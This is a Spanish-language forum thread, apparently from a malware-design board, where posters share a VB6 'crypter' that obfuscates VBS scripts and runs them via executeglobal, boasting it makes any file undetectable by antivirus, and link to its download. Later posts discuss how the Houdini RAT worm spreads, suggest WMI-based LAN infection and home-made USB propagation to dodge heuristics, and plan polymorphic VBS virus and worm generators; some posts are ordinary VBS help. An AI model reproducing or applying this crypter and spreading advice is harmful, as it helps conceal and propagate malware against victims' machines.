Mensajes

nsanedown 

La idea es no depender de un programa externo para codificar un codigo cuando tu mismo ppuedes hacerlo. Por eso me estoy dando a la tarea de completar el codigo. Gracias por la Web, ahora mismo la reviso. Disculpa que me demore en contestar, pero aki en qva es un poco dificil estar conectado. En cuanto termine de hacer el encriptador te aviso para que lo veas y quienes lo quieran disfrutar, por favor, no quitar las referencias su autor XD

Buenos días, quizás éste código te pueda ayudar...


http://foro.elhacker.net/analisis_y_diseno_de_malware/cactus_vbs_crypter_10-t409804.0.html

Saludos

https://www.mediafire.com/?xi3iug9bcar5r9z

Aquí tienes mi programa para descargar, está compilado para que lo puedas usar, pero si quieres puedes mirar el source que está incluido en el ZIP.

Con éste programa podrás cifrar un mismo fichero de distintas formas, cada copia será única, con nombres de variables aleatorios, stringencription randon, tamaño del fichero final aleatorio, etc...

Debería dejarte cualquier fichero VBS FUD ante cualquier AV.

Que lo disfrutes!

Hola, Bienvenido al foro.

Hay varias formas de cifrar un VBS. Recientemente he creado un pequeño programa para cifrar cualquier VBS, lo deja "oculto" y completamente FUD a los antivirus:



El programa es MUY sencillo, simplemente poner un TextBox y un botón. En el código del botón escribir:

Código (vb) [Seleccionar] Expandir

Private Sub menuC_Click()
   Randomize
   Separator1 = Mid("!|@#$%&=-_", Int(Rnd * 10) + 1, 1)
   Variables1 = Mid("ABCD", Int(Rnd * 4) + 1, 1)
   Variables2 = Mid("WXYZ", Int(Rnd * 4) + 1, 1)
   
   R = Int(Rnd * 10)

   For i = 1 To Len(Text1.Text)
       X = X & (Asc(Mid(Text1.Text, i, 1)) - R) & Separator1
   Next i
   
   Open App.Path & "\crypted.vbs" For Output As #1
       Print #1, Variables1 & " = " & Chr(34) & X & Chr(34)
       Print #1, Variables1 & " = split(" & Variables1 & "," & Chr(34) & Separator1 & Chr(34) & ")"
       Print #1, "for i = 0 to ubound(" & Variables1 & ") - 1"
       Print #1, Variables2 & " = " & Variables2 & " & chr(" & Variables1 & "(i)+" & R & ")"
       Print #1, "next"
       Print #1, "executeglobal " & Variables2
   Close #1
   DoEvents
   MsgBox "Encryption completed!" & vbCrLf & vbCrLf & "File saved here: " & App.Path & "\crypted.vbs" & vbCrLf & vbCrLf & "Cryptonumber used: " & R
End Sub


El programa puede generar hasta 90 archivos diferentes (si mis cálculos no fallan). En la foto, el código VBS cifrado quedaría así:

Código (vb) [Seleccionar] Expandir

D = "32%73%90%108%109%94%25%114%104%110%107%25%79%59%76%25%108%104%110%107%92%94%25%97%94%107%94%25%90%103%93%25%105%107%94%108%108%25%109%97%94%25%91%110%109%109%104%103%39%39%39%6%3%6%3%70%108%96%59%104%113%25%27%62%108%109%104%25%94%108%25%110%103%90%25%105%107%110%94%91%90%25%105%90%107%90%25%94%101%97%90%92%100%94%107%39%103%94%109%27%"
D = split(D,"%")
for i = 0 to ubound(D) - 1
Y = Y & chr(D(i)+7)
next
executeglobal Y

Aunque también podría quedar así:

Código (vb) [Seleccionar] Expandir

B = "36|77|94|112|113|98|29|118|108|114|111|29|83|63|80|29|112|108|114|111|96|98|29|101|98|111|98|29|94|107|97|29|109|111|98|112|112|29|113|101|98|29|95|114|113|113|108|107|43|43|43|10|7|10|7|74|112|100|63|108|117|29|31|66|112|113|108|29|98|112|29|114|107|94|29|109|111|114|98|95|94|29|109|94|111|94|29|98|105|101|94|96|104|98|111|43|107|98|113|31|"
B = split(B,"|")
for i = 0 to ubound(B) - 1
X = X & chr(B(i)+3)
next
executeglobal X

Si alguien le interesa mi programa para cifrar, subo el EXE + Source. Saludos!!

https://www.mediafire.com/?xi3iug9bcar5r9z

1.- se puede mostrar mas de 1 inputbox en una ventana?

No, InputBox detiene la ejecución del script hasta que se introduzca un dato (o se cancele el input)

1.2- algun codigo como inputbox que me permita arrastrar una carpeta o archivo y automáticamente aparezca la ruta de este como en batch?

Código (vb) [Seleccionar] Expandir

Set objShell = CreateObject("Shell.Application")
Set objFolder = objShell.BrowseForFolder(0, "Example", 1, "c:\Programs")
If objFolder Is Nothing Then
    Wscript.Quit
End If
wscript.Echo "folder: " & objFolder.title & " Path: " & objFolder.self.path

2.- como hago para que el vbs me ejecute un archivo y espere hasta el cierre de este para continuar.

No lo se

3.- algun codigo en vbs que cumpla la misma funcion que "GOTO" en batch?
(ya que solo funciona goto en on error)

No existe el GoTo en VBS, de todas formas no lo necesitas. El GoTo debería ser eliminado de cualquier lenguaje de programación. En las practicas de la escuela, si mi profesor ve un GoTo te suspende el proyecto. jejej

4.- algun ejemplo simple de como usar "loop" y "do"

Código (vb) [Seleccionar] Expandir

AA = 1

Do
AA = AA +1
if AA = 5 then Exit Do
Loop
MsgBox AA

''''''''''''''''''''''''''''

AA = 1

While AA <> 7
AA = AA + 1
Wend

MsgBox AA

En el foro tienes el source del RAT houdini, utiliza http.xml2 y adobstreams para cargar/descargar ficheros. Te servirá también para hacer lo de las imágenes.

Para algo sencillo, te recomiendo que utilices el objeto de VBS Scripting.FileSystemObject, con él podrás hacer ésto que pides y más cosillas.

Te voy a explicar como yo lo hago, pero no voy a darte código, lo escribiré en pseudo-code:

'server
IMG-SOURCE = OpenTextFile(mifoto.jpg)
Winsock.Send(IMG-SOURCE)

'client
GetData(xData)
CreateTextFile("tmpfile.jpg",xData)
LoadPicture("tmpfile.jpg")

Saludos!!

Puedes postear una copia del ejecutable para que la pueda analizar?

Vayamos por partes...

Últimamente se le está dando mucho bombo al gusano de houdini y creo que hay que detenerse un poco y analizar el motivo por el cual ese RAT (sí, es un troyano) tiene una alta tasa de propagación...

Los métodos de propagación del houdini son bastante básicos/normales/conocidos:

• Sustitución de ficheros por accesos directos infectados
• Propagación por USB

Entonces... como es posible que ese worm/RAT se propague tanto?... Pues la respuesta es que utiliza VBS. Actualmente cualquier aplicación EXE es fácilmente detectada por los AV's, el hecho que houdini utilice VBS hace que su detección sea algo más complicada, además que s epuede cifrar y FUDear muy fácilmente cualquier fichero VBS. Incluso se me ocurre la idea de crear un gusaon en VBS polimórfico (es decir, que cada copia del gusano sea diferente y cambie su estructura, manteniendo su funcionalidad). Hacer ese tipo de cosas en VBS es realmente sencillo, de ahí viene el éxito de su propagación.

Por ejemplo, el famoso LoveLetter estaba en VBS también, AnnaKournikova, Melissa (éste era DOC/macro, pero es casi lo mismo) son claros ejemplos.

Sobre tus consultas, el sistema de propagación LAN lo puedes desarrolar usando mi ejemplo de infección por WMI (el del regedit) y el sistema de propagación USB está muy explotado, lo mejor es que utilices un sistema sencillo y de programación casera. Así evitarás la heurística.

Saludos!!



EDIT

Vale, acabo de hacer una prueba rápida y sencilla. Es posible programar un módulo para hacer virus/troyanos/worms/downloaders polimórficos en VBS de forma rápida y sencilla. Voy a ver si puedo programar un ejemplo sencillo y lo publico en el foro...